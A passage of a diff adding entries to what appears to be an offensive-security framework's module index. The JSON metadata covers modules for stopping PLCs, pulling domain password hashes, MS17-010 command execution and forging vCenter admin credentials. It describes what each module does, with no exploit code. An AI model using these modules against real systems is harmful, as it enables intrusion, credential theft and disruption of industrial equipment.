
One of them is the configuration page for notifications, which returns the cleartext credentials (CVE-2025-22896) before correctly veryfing that the associated request is coming from an authenticated and authorized entity.", + "references": [ + "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16", + "CVE-2025-24865", + "CVE-2025-22896" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 34022, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-20 15:40:05 +0000", + "path": "/modules/auxiliary/admin/scada/mypro_mgr_creds.rb", + "is_install_path": true, + "ref_name": "admin/scada/mypro_mgr_creds", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/pcom_command": { + "name": "Unitronics PCOM remote START/STOP/RESET command", + "fullname": "auxiliary/admin/scada/pcom_command", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Luis Rosa " + ], + "description": "Unitronics Vision PLCs allow remote administrative functions to control\n the PLC using authenticated PCOM commands.\n\n This module supports START, STOP and RESET operations.", + "references": [ + "URL-https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf" + ], + "platform": "", + "arch": "", + "rport": 20256, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-01-29 16:19:13 +0000", + "path": "/modules/auxiliary/admin/scada/pcom_command.rb", + "is_install_path": true, + "ref_name": "admin/scada/pcom_command", + "check": false, + "post_auth": false, + "default_credential": false, 
+ "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/phoenix_command": { + "name": "PhoenixContact PLC Remote START/STOP Command", + "fullname": "auxiliary/admin/scada/phoenix_command", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-05-20", + "type": "auxiliary", + "author": [ + "Tijl Deneut " + ], + "description": "PhoenixContact Programmable Logic Controllers are built upon a variant of\n ProConOS. Communicating using a proprietary protocol over ports TCP/1962\n and TCP/41100 or TCP/20547.\n It allows a remote user to read out the PLC Type, Firmware and\n Build number on port TCP/1962.\n And also to read out the CPU State (Running or Stopped) AND start\n or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)\n or on port TCP/20547 (confirmed ILC 39x series)", + "references": [ + "URL-https://github.com/tijldeneut/ICSSecurityScripts", + "CVE-2014-9195" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/scada/phoenix_command.rb", + "is_install_path": true, + "ref_name": "admin/scada/phoenix_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/yokogawa_bkbcopyd_client": { + "name": "Yokogawa BKBCopyD.exe Client", + "fullname": "auxiliary/admin/scada/yokogawa_bkbcopyd_client", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-08-09", + "type": "auxiliary", + "author": [ + "Unknown" + ], + "description": "This module allows an unauthenticated user to interact with the Yokogawa\n CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n operations.", + "references": [ + "CVE-2014-5208", + 
"URL-https://www.rapid7.com/blog/post/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access" + ], + "platform": "", + "arch": "", + "rport": 20111, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-03-10 10:28:25 +0000", + "path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb", + "is_install_path": true, + "ref_name": "admin/scada/yokogawa_bkbcopyd_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "PMODE", + "description": "Leak the current database" + }, + { + "name": "RETR", + "description": "Retrieve remote file" + }, + { + "name": "STOR", + "description": "Store remote file" + } + ] + }, + "auxiliary_admin/sccm/get_naa_credentials": { + "name": "Get NAA Credentials", + "fullname": "auxiliary/admin/sccm/get_naa_credentials", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "xpn", + "skelsec", + "smashery" + ], + "description": "This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.\n This requires a computer account, which can be added using the samr_account module.", + "references": [ + "URL-https://blog.xpnsec.com/unobfuscating-network-access-accounts/", + "URL-https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md", + "URL-https://github.com/Mayyhem/SharpSCCM", + "URL-https://github.com/garrettfoster13/sccmhunter" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-05-05 11:16:35 +0000", + "path": "/modules/auxiliary/admin/sccm/get_naa_credentials.rb", + "is_install_path": true, + "ref_name": 
"admin/sccm/get_naa_credentials", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/serverprotect/file": { + "name": "TrendMicro ServerProtect File Access", + "fullname": "auxiliary/admin/serverprotect/file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "toto" + ], + "description": "This modules exploits a remote file access flaw in the ServerProtect Windows\n Server RPC service. Please see the action list (or the help output) for more\n information.", + "references": [ + "CVE-2007-6507", + "OSVDB-44318", + "ZDI-07-077" + ], + "platform": "", + "arch": "", + "rport": 5168, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-05-12 22:15:21 +0000", + "path": "/modules/auxiliary/admin/serverprotect/file.rb", + "is_install_path": true, + "ref_name": "admin/serverprotect/file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "delete", + "description": "Delete a file" + }, + { + "name": "download", + "description": "Download a file" + }, + { + "name": "list", + "description": "List files (not recommended - will crash the driver)" + }, + { + "name": "upload", + "description": "Upload a file" + } + ] + }, + "auxiliary_admin/smb/change_password": { + "name": "SMB Password Change", + "fullname": "auxiliary/admin/smb/change_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "smashery" + ], + "description": "Change the password of an account using SMB. 
This provides several different\n APIs, each of which have their respective benefits and drawbacks.", + "references": [ + "URL-https://github.com/fortra/impacket/blob/master/examples/changepasswd.py" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/smb/change_password.rb", + "is_install_path": true, + "ref_name": "admin/smb/change_password", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "CHANGE", + "description": "Change the password, knowing the existing one. New AES kerberos keys will be generated." + }, + { + "name": "CHANGE_NTLM", + "description": "Change the password to a NTLM hash value, knowing the existing password. AES kerberos authentication will not work until a standard password change occurs." + }, + { + "name": "RESET", + "description": "Reset the target's password without knowing the existing one (requires appropriate permissions). New AES kerberos keys will be generated." + }, + { + "name": "RESET_NTLM", + "description": "Reset the target's NTLM hash, without knowing the existing password. AES kerberos authentication will not work until a standard password change occurs." 
+ } + ] + }, + "auxiliary_admin/smb/check_dir_file": { + "name": "SMB Scanner Check File/Directory Utility", + "fullname": "auxiliary/admin/smb/check_dir_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "aushack ", + "j0hn__f" + ], + "description": "This module is useful when checking an entire network\n of SMB hosts for the presence of a known file or directory.\n An example would be to scan all systems for the presence of\n antivirus or known malware outbreak. Typically you must set\n RPATH, SMBUser, SMBDomain and SMBPass to operate correctly.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/admin/smb/check_dir_file.rb", + "is_install_path": true, + "ref_name": "admin/smb/check_dir_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/delete_file": { + "name": "SMB File Delete Utility", + "fullname": "auxiliary/admin/smb/delete_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "mubix " + ], + "description": "This module deletes a file from a target share and path. 
The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/smb/delete_file.rb", + "is_install_path": true, + "ref_name": "admin/smb/delete_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/download_file": { + "name": "SMB File Download Utility", + "fullname": "auxiliary/admin/smb/download_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "mubix " + ], + "description": "This module downloads a file from a target share and path. 
The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/smb/download_file.rb", + "is_install_path": true, + "ref_name": "admin/smb/download_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/list_directory": { + "name": "SMB Directory Listing Utility", + "fullname": "auxiliary/admin/smb/list_directory", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "mubix ", + "hdm " + ], + "description": "This module lists the directory of a target share and path. 
The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/admin/smb/list_directory.rb", + "is_install_path": true, + "ref_name": "admin/smb/list_directory", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/ms17_010_command": { + "name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", + "fullname": "auxiliary/admin/smb/ms17_010_command", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-14", + "type": "auxiliary", + "author": [ + "sleepya", + "zerosum0x0", + "Shadow Brokers", + "Equation Group" + ], + "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.", + "references": [ + "MSB-MS17-010", + "CVE-2017-0143", + "CVE-2017-0146", + "CVE-2017-0147", + "URL-https://github.com/worawit/MS17-010", + "URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", + "URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb", + "is_install_path": true, + "ref_name": "admin/smb/ms17_010_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "ETERNALSYNERGY", + "ETERNALROMANCE", + "ETERNALCHAMPION", + "ETERNALBLUE" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/psexec_ntdsgrab": { + "name": "PsExec NTDS.dit And SYSTEM Hive Download Utility", + "fullname": "auxiliary/admin/smb/psexec_ntdsgrab", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Royce Davis " + ], + "description": "This module authenticates to an Active Directory Domain Controller and creates\n a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the\n ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM\n hive copy can be used in combination with other tools for offline extraction of AD\n password hashes. 
All of this is done without uploading a single binary to the\n target host.", + "references": [ + "URL-http://sourceforge.net/projects/smbexec", + "URL-https://www.optiv.com/blog/owning-computers-without-shell-access" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb", + "is_install_path": true, + "ref_name": "admin/smb/psexec_ntdsgrab", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/samba_symlink_traversal": { + "name": "Samba Symlink Directory Traversal", + "fullname": "auxiliary/admin/smb/samba_symlink_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "kcope", + "hdm " + ], + "description": "This module exploits a directory traversal flaw in the Samba\n CIFS server. 
To exploit this flaw, a writeable share must be specified.\n The newly created directory will link to the root filesystem.", + "references": [ + "CVE-2010-0926", + "OSVDB-62145", + "URL-http://www.samba.org/samba/news/symlink_attack.html" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/admin/smb/samba_symlink_traversal.rb", + "is_install_path": true, + "ref_name": "admin/smb/samba_symlink_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/upload_file": { + "name": "SMB File Upload Utility", + "fullname": "auxiliary/admin/smb/upload_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module uploads a file to a target share and path. 
The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/smb/upload_file.rb", + "is_install_path": true, + "ref_name": "admin/smb/upload_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/smb/webexec_command": { + "name": "WebEx Remote Command Execution Utility", + "fullname": "auxiliary/admin/smb/webexec_command", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Ron Bowes " + ], + "description": "This module enables the execution of a single command as System by exploiting a remote\n code execution vulnerability in Cisco's WebEx client software.", + "references": [ + "URL-https://webexec.org", + "CVE-2018-15442" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2018-10-24 16:18:17 +0000", + "path": "/modules/auxiliary/admin/smb/webexec_command.rb", + "is_install_path": true, + "ref_name": "admin/smb/webexec_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/sunrpc/solaris_kcms_readfile": { + "name": "Solaris KCMS + TTDB Arbitrary File Read", + "fullname": "auxiliary/admin/sunrpc/solaris_kcms_readfile", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-01-22", + "type": "auxiliary", + "author": [ 
+ "vlad902 ", + "jduck " + ], + "description": "This module targets a directory traversal vulnerability in the\n kcms_server component from the Kodak Color Management System. By\n utilizing the ToolTalk Database Server\\'s TT_ISBUILD procedure, an\n attacker can bypass existing directory traversal validation and\n read arbitrary files.\n\n Vulnerable systems include Solaris 2.5 - 9 SPARC and x86. Both\n kcms_server and rpc.ttdbserverd must be running on the target\n host.", + "references": [ + "CVE-2003-0027", + "OSVDB-8201", + "BID-6665", + "URL-http://marc.info/?l=bugtraq&m=104326556329850&w=2" + ], + "platform": "", + "arch": "", + "rport": 111, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2019-10-05 13:50:30 +0000", + "path": "/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb", + "is_install_path": true, + "ref_name": "admin/sunrpc/solaris_kcms_readfile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/teradata/teradata_odbc_sql": { + "name": "Teradata ODBC SQL Query Module", + "fullname": "auxiliary/admin/teradata/teradata_odbc_sql", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-03-29", + "type": "auxiliary", + "author": [ + "Ted Raffle (actuated)" + ], + "description": "SQL query module for ODBC connections to local Teradata databases.\n\n Port specification (TCP 1025 by default) is not necessary for ODBC connections.\n\n Requires ODBC driver and Python Teradata module.", + "references": [ + "URL-https://developer.teradata.com/tools/reference/teradata-python-module", + "URL-https://downloads.teradata.com/download/connectivity/odbc-driver/linux" + ], + "platform": "", + "arch": "", + "rport": 1025, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-05-17 17:04:49 +0000", + "path": 
"/modules/auxiliary/admin/teradata/teradata_odbc_sql.py", + "is_install_path": true, + "ref_name": "admin/teradata/teradata_odbc_sql", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "AKA": [ + "Teradata ODBC Authentication Scanner" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/tftp/tftp_transfer_util": { + "name": "TFTP File Transfer Utility", + "fullname": "auxiliary/admin/tftp/tftp_transfer_util", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "todb " + ], + "description": "This module will transfer a file to or from a remote TFTP server.\n Note that the target must be able to connect back to the Metasploit system,\n and NAT traversal for TFTP is often unsupported.\n\n Two actions are supported: \"Upload\" and \"Download,\" which behave as one might\n expect -- use 'set action Actionname' to use either mode of operation.\n\n If \"Download\" is selected, at least one of FILENAME or REMOTE_FILENAME\n must be set. If \"Upload\" is selected, either FILENAME must be set to a valid path to\n a source file, or FILEDATA must be populated. 
FILENAME may be a fully qualified path,\n or the name of a file in the Msf::Config.local_directory or Msf::Config.data_directory.", + "references": [ + "URL-http://www.faqs.org/rfcs/rfc1350.html", + "URL-http://www.networksorcery.com/enp/protocol/tftp.htm" + ], + "platform": "", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/tftp/tftp_transfer_util.rb", + "is_install_path": true, + "ref_name": "admin/tftp/tftp_transfer_util", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download REMOTE_FILENAME as FILENAME from the server." + }, + { + "name": "Upload", + "description": "Upload FILENAME as REMOTE_FILENAME to the server." + } + ] + }, + "auxiliary_admin/tikiwiki/tikidblib": { + "name": "TikiWiki Information Disclosure", + "fullname": "auxiliary/admin/tikiwiki/tikidblib", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-11-01", + "type": "auxiliary", + "author": [ + "Matteo Cantoni " + ], + "description": "A vulnerability has been reported in Tikiwiki, which can be exploited by\n an anonymous user to dump the MySQL user & passwd just by creating a mysql\n error with the \"sort_mode\" var.\n\n The vulnerability was reported in Tikiwiki version 1.9.5.", + "references": [ + "OSVDB-30172", + "BID-20858", + "CVE-2006-5702", + "URL-https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/tikiwiki/tikidblib.rb", + "is_install_path": true, + "ref_name": 
"admin/tikiwiki/tikidblib", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Dump", + "description": "Dump user and password" + } + ] + }, + "auxiliary_admin/upnp/soap_portmapping": { + "name": "UPnP IGD SOAP Port Mapping Utility", + "fullname": "auxiliary/admin/upnp/soap_portmapping", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "St0rn ", + "Jon Hart " + ], + "description": "Manage port mappings on UPnP IGD-capable device using the AddPortMapping and\n DeletePortMapping SOAP requests", + "references": [ + "URL-http://www.upnp-hacks.org/igd.html" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/upnp/soap_portmapping.rb", + "is_install_path": true, + "ref_name": "admin/upnp/soap_portmapping", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ADD", + "description": "Use the AddPortMapping SOAP command to open and forward a port" + }, + { + "name": "DELETE", + "description": "Use the DeletePortMapping SOAP command to remove a port forwarding" + } + ] + }, + "auxiliary_admin/vmware/poweroff_vm": { + "name": "VMWare Power Off Virtual Machine", + "fullname": "auxiliary/admin/vmware/poweroff_vm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine " + ], + "description": "This module will log into the Web API of VMWare and try to power off\n a specified Virtual Machine.", + "references": [], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 
443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/vmware/poweroff_vm.rb", + "is_install_path": true, + "ref_name": "admin/vmware/poweroff_vm", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vmware/poweron_vm": { + "name": "VMWare Power On Virtual Machine", + "fullname": "auxiliary/admin/vmware/poweron_vm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine " + ], + "description": "This module will log into the Web API of VMWare and try to power on\n a specified Virtual Machine.", + "references": [], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/vmware/poweron_vm.rb", + "is_install_path": true, + "ref_name": "admin/vmware/poweron_vm", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vmware/tag_vm": { + "name": "VMWare Tag Virtual Machine", + "fullname": "auxiliary/admin/vmware/tag_vm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine " + ], + "description": "This module will log into the Web API of VMWare and\n 'tag' a specified Virtual Machine. 
It does this by\n logging a user event with user supplied text", + "references": [], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/vmware/tag_vm.rb", + "is_install_path": true, + "ref_name": "admin/vmware/tag_vm", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vmware/terminate_esx_sessions": { + "name": "VMWare Terminate ESX Login Sessions", + "fullname": "auxiliary/admin/vmware/terminate_esx_sessions", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine " + ], + "description": "This module will log into the Web API of VMWare and try to terminate\n user login sessions as specified by the session keys.", + "references": [], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb", + "is_install_path": true, + "ref_name": "admin/vmware/terminate_esx_sessions", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vmware/vcenter_forge_saml_token": { + "name": "VMware vCenter Forge SAML Authentication Credentials", + "fullname": "auxiliary/admin/vmware/vcenter_forge_saml_token", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-04-20", + "type": "auxiliary", + "author": [ + "npm " + ], + "description": "This module forges valid SAML 
credentials for vCenter server\n using the vCenter SSO IdP certificate, IdP private key, and\n VMCA certificates as input objects; you must also provide\n the vCenter SSO domain name and vCenter FQDN. The module will\n return a session cookie for the /ui path that grants access to\n the SSO domain as a vSphere administrator. The IdP trusted\n certificate chain can be retrieved using Metasploit post\n exploitation modules or extracted manually from\n /storage/db/vmware-vmdir/data.mdb using binwalk.", + "references": [ + "URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/" + ], + "platform": "Linux", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-10-03 19:50:04 +0000", + "path": "/modules/auxiliary/admin/vmware/vcenter_forge_saml_token.rb", + "is_install_path": true, + "ref_name": "admin/vmware/vcenter_forge_saml_token", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Run", + "description": "Generate vSphere session cookie" + } + ] + }, + "auxiliary_admin/vmware/vcenter_offline_mdb_extract": { + "name": "VMware vCenter Extract Secrets from vmdir / vmafd DB File", + "fullname": "auxiliary/admin/vmware/vcenter_offline_mdb_extract", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-05-10", + "type": "auxiliary", + "author": [ + "npm " + ], + "description": "Grab certificates from the vCenter server vmdird and vmafd\n database files and adds them to loot. 
The vmdird MDB database file\n can be found on the live appliance under the path\n /storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path\n /storage/db/vmware-vmafd/afd.db. The vmdir database contains the\n IdP signing credential, and vmafd contains the vCenter certificate\n store. This module will accept either file from a live vCenter\n appliance, or from a vCenter appliance backup archive; either or\n both files can be supplied.", + "references": [ + "URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/" + ], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-05-26 11:52:56 +0000", + "path": "/modules/auxiliary/admin/vmware/vcenter_offline_mdb_extract.rb", + "is_install_path": true, + "ref_name": "admin/vmware/vcenter_offline_mdb_extract", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + 